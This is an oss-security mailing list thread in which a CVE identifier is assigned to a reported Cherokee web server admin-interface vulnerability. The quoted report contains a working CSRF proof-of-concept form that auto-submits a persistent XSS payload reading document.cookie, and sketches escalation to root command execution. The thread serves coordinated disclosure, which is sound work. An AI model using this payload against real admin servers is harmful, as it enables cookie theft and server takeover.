Re: Security issue in cherokee

[Josh Bressers <bressers () redhat com>]

As best as I can tell, this is the same request from Jan on 2011-06-02.

Please use CVE-2011-2191

Thanks.

-- 
    JB

----- Original Message -----
> A security bug was reported against cherokee in Ubuntu. You are being
> emailed as the upstream contact. Please keep oss-security[1] CC'd for
> any updates on this issue.
>
> This issue should be considered public, but has not yet been assigned
> a
> CVE. Once a CVE is assigned, please mention it in any changelogs.
>
> Details from the public bug follow:
> https://launchpad.net/bugs/784632
>
> From the reporter:
> ----
> The cherokee admin server is vulnerable to csrf.
>
> Using csrf it is possible to produce a persistent xss in several pages
> -
> including the 'status' page via the 'nickname field' of a vserver.
> An example of this is the following:
>
> <html>
> <body>
> <form action="http://127.0.0.1:9090/vserver/apply"; method="post"
> id="xssform">
> <input type="text" name="tmp!new_droot" value='/var/www/'></input>
> <input type="text" name="tmp!new_nick" value='" onselect=alert(1)
> autofocus> <embed src="javascript:alert(document.cookie)">'></input>
> </form>
> <script>document.getElementById("xssform").submit();</script>
> </body>
>
> A Worst case scenario could be something like the following:
> If a user is logged in and the cherokee admin server is running on
> localhost:9090 then if they visit a $bad page - the bad page may be
> able
> to send requests to the server so as to reconfigure it to:
>
> 1. run as root
> 2. the logging of error(or access) will run a command ...
> ----
>
> Thanks in advance for your cooperation in coordinating a fix for this
> issue,
>
> Jamie Strandboge
>
> [1] oss-security () lists openwall com is a public mailing list for
> people to collaborate on security vulnerabilities and coordinate
> security updates.
>
> --
> Jamie Strandboge | http://www.canonical.com